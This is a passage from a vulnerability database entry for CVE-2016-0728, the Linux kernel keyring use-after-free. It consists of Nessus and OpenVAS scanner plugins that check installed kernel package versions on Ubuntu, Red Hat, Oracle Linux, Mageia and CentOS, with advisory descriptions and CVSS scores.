get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310842608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842608", "type": "openvas", "title": "Ubuntu Update for linux-lts-wily USN-2872-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-wily USN-2872-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842608\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:24 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-wily USN-2872-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-wily'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-wily on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2872-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2872-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-generic-lpae\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-lowlatency\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-e500mc\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc-smp\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-emb\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-25-powerpc64-smp\", ver:\"4.2.0-25.30~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-01-26T00:00:00", "id": "OPENVAS:1361412562310871546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871546", "type": "openvas", "title": "RedHat Update for kernel RHSA-2016:0064-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:0064-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871546\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-26 06:10:44 +0100 (Tue, 26 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:0064-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\n * A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0064-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-January/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~327.4.5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Oracle Linux Local Security Checks ELSA-2016-3510", "modified": "2019-03-14T00:00:00", "published": "2016-01-21T00:00:00", "id": "OPENVAS:1361412562310122851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122851", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-3510", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-3510.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122851\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-21 07:29:49 +0200 (Thu, 21 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-3510\");\n script_tag(name:\"insight\", value:\"ELSA-2016-3510 - kernel-uek security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-3510\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-3510.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~4.1.12~32.1.2.el7uek~0.5.1~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~4.1.12~32.1.2.el7uek\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~4.1.12~32.1.2.el6uek~0.5.1~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~4.1.12~32.1.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Mageia Linux Local Security Checks mgasa-2016-0033", "modified": "2019-03-14T00:00:00", "published": "2016-01-25T00:00:00", "id": "OPENVAS:1361412562310131197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131197", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0033.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131197\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 07:27:45 +0200 (Mon, 25 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0033\");\n script_tag(name:\"insight\", value:\"Perception Point Research Team found a reference leak in keyring in join_session_keyring() that can be exploited to successfully escalate privileges from a local user to root (CVE-2016-0728). Other fixes in this kernel update: - netfilter: nf_nat_redirect: add missing NULL pointer check\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0033.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0033\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kernel-userspace-headers\", rpm:\"kernel-userspace-headers~4.1.15~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-vboxadditions\", rpm:\"kmod-vboxadditions~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-virtualbox\", rpm:\"kmod-virtualbox~5.0.12~2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-xtables-addons\", rpm:\"kmod-xtables-addons~2.7~8.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-broadcom-wl\", rpm:\"kmod-broadcom-wl~6.30.223.271~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-fglrx\", rpm:\"kmod-fglrx~15.200.1046~9.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia304\", rpm:\"kmod-nvidia304~304.128~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia340\", rpm:\"kmod-nvidia340~340.93~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"kmod-nvidia-current\", rpm:\"kmod-nvidia-current~346.96~5.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-01-26T00:00:00", "id": "OPENVAS:1361412562310882377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882377", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:0064 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:0064 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882377\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-26 06:11:02 +0100 (Tue, 26 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:0064 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\n * A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0064\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-January/021625.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 